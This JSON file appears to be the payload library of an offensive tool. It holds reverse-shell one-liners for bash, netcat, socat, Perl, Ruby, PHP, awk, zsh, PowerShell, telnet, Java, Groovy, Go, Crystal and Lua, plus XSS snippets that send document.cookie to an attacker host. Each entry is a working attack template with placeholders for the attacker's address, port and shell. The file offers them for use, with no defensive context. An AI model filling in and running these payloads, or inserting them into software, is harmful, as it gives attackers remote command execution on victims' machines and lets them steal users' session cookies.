{
"bash": {
"i": {
"payload": "bash -i >& /dev/tcp/<<LHOST>>/<<LPORT>> 0>&1"
},
"i_c": {
"payload": "/bin/bash -c 'bash -i >& /dev/tcp/<<LHOST>>/<<LPORT>> 0>&1'"
},
"196": {
"payload": "0<&196;exec 196<>/dev/tcp/<<LHOST>>/<<LPORT>>; bash <&196 >&196 2>&196"
},
"readline": {
"payload": "exec 5<>/dev/tcp/<<LHOST>>/<<LPORT>>;cat <&5 | while read line; do $line 2>&5 >&5; done"
}
},
"nc": {
"mkfifo": {
"payload": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<<SHELLBIN>> -i 2>&1|nc <<LHOST>> <<LPORT>> >/tmp/f"
},
"e": {
"payload": "nc <<LHOST>> <<LPORT>> -e <<SHELLBIN>>"
},
"c": {
"payload": "nc -c <<SHELLBIN>> <<LHOST>> <<LPORT>>"
}
},
"socat": {
"tcp": {
"payload": "socat TCP:<<LHOST>>:<<LPORT>> EXEC:<<SHELLBIN>>"
},
"tcp-tty": {
"payload": "socat TCP:<<LHOST>>:<<LPORT>> EXEC:'<<SHELLBIN>>',pty,stderr,setsid,sigint,sane"
}
},
"perl": {
"socket": {
"payload": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"<<LHOST>>:<<LPORT>>\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
},
"socket_bash_i": {
"payload": "perl -e 'use Socket;$i=\"<<LHOST>>\";$p=<<LPORT>>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"bash -i\");};'"
}
},
"ruby": {
"exec": {
"payload": "ruby -rsocket -e'spawn(\"<<SHELLBIN>>\",[:in,:out,:err]=>TCPSocket.new(\"<<LHOST>>\",<<LPORT>>))'"
},
"solo": {
"payload": "ruby -rsocket -e'exit if fork;c=TCPSocket.new(\"<<LHOST>>\",<<LPORT>>);loop{c.gets.chomp!;(exit! if $_==\"exit\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \"failed: #{$_}\"}'"
}
},
"php": {
"r-exec": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);exec(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-shell_exec": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);shell_exec(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-system": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);system(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-passthru": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);passthru(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-qoute": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);`<<SHELLBIN>> <&3 >&3 2>&3`'"
},
"r-popen": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);popen(\"<<SHELLBIN>> <&3 >&3 2>&3\", \"r\");'"
},
"r-procopen": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);$proc=proc_open(\"<<SHELLBIN>>\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'"
}
},
"awk": {
"linux": {
"payload": "awk 'BEGIN {s = \"/inet/tcp/0/<<LHOST>>/<<LPORT>>\"; while(42) { do{ printf \"pss>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"
}
},
"zsh": {
"linux": {
"payload": "zsh -c 'zmodload zsh/net/tcp && ztcp <<LHOST>> <<LPORT>> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
}
},
"powershell": {
"simple": {
"payload": "$a=New-Object System.Net.Sockets.TCPClient('<<LHOST>>',<<LPORT>>);$b=$a.GetStream();[byte[]]$d=0..65535|%{0};while(($e=$b.Read($d,0,$d.Length))-ne 0){;$i=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($d,0,$e);$k=(iex $i 2>&1 | Out-String);$m=$k + 'PS ' +(pwd).Path + '> ';$o=([text.encoding]::ASCII).GetBytes($m);$b.Write($o,0,$o.Length);$b.Flush()};$a.Close()"
},
"simple_2": {
"payload": "$sm=(New-Object Net.Sockets.TCPClient('<<LHOST>>',<<LPORT>>)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}"
},
"simple_3": {
"payload": "$TCPClient = New-Object Net.Sockets.TCPClient('<<LHOST>>',<<LPORT>>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
}
},
"telenet": {
"simple": {
"payload": "TF=$(mktemp -u);mkfifo $TF && telnet <<LHOST>> <<LPORT>> 0<$TF | <<SHELLBIN>> 1>$TF"
}
},
"java": {
"runtime-exec-bash-i": {
"payload": "Runtime.getRuntime().exec(\"<<SHELLBIN>> -c $@|<<SHELLBIN>> 0 echo <<SHELLBIN>> -i >& /dev/tcp/<<LHOST>>/<<LPORT>> 0>&1\");"
}
},
"groovy": {
"simple": {
"payload": "String host=\"<<LHOST>>\";int port=<<LPORT>>;String cmd=\"<<SHELLBIN>>\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();"
}
},
"golang": {
"simple": {
"payload": "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<<LHOST>>:<<LPORT>>\");cmd:=exec.Command(\"<<SHELLBIN>>\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go"
}
},
"crystal": {
"simple": {
"payload": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"<<LHOST>>\",<<LPORT>>);loop{m,l=c.receive;p=Process.new(m.rstrip(\"\n\"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'"
}
},
"lua": {
"simple": {
"payload": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('<<LHOST>>','<<LPORT>>');os.execute('<<SHELLBIN>> -i <&3 >&3 2>&3');\""
},
"5.1": {
"payload": "lua5.1 -e 'local host, port = \"<<LHOST>>\", <<LPORT>> local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'"
}
},
"html": {
"xss-img-cookie-grab-fetch": {
"payload": "<img src=x onerror='fetch(\"http://<<LHOST>>/?c=\"+document.cookie);' />"
},
"xss-img-cookie-grab": {
"payload": "<img src=x onerror='document.location=\"http://<<LHOST>>/?c=\"+document.cookie;' />"
},
"xss-script-cookie-grab-fetch": {
"payload": "<script type=\"text/javascript\">fetch(\"http://<<LHOST>>/?c=\"+document.cookie);</script>"
},
"xss-script-cookie-grab": {
"payload": "<script type=\"text/javascript\">document.location=\"http://<<LHOST>>/?c=\"+document.cookie;</script>"
}
}
}